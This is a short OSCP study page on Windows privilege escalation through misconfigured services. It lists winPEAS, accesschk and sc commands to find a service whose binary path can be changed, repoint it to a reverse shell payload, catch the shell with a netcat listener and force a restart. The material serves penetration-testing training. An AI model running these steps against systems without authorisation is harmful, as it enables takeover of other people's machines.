Service Exploits

Service exploits are very likely to come up in your OSCP exam.

This can include things like insecure file permissions and unquoted service path’s, amongst others.

This should probably be your biggest area of focus for Windows priv esc before your exam.

Run winPEAS to check whether you can change the configuration of a service or not:

Download winPEAS to your Windows target

Execute the binary:
winpeas.exe

Can you modify the service?

Download accesschk.exe to your Windows target

accesschk.exe /accepteula -uwcqv user <SERVICE>

What does the service do? Can your user restart it?

sc qc <SERVICE>

'DEMAND_START' means the service would have to be restarted manually

'BINARY_PATH_NAME' points to the service executable

What is the current state of the service?

sc query <SERVICE>

Can you set a new binary path for the service?

If so, download a reverse shell payload to your target and set a new path:

sc config <SERVICE> binpath= "\"C:\NEW\PATH\TO\BINARY""

Set up a Netcat listener:

nc -lnvp <PORT>

Start or restart the service:

net start <SERVICE>

or

net restart <SERVICE>

or

sc config <SERVICE> start= demand

You might need to stop the service first:

net stop <SERVICE>

Offensive Security might try to be sneaky and disable your ability to start or restart a service.

You can, however, get around this by restarting the machine (if the service autoruns on startup):

shutdown /r

Last updated 4 years ago

Was this helpful?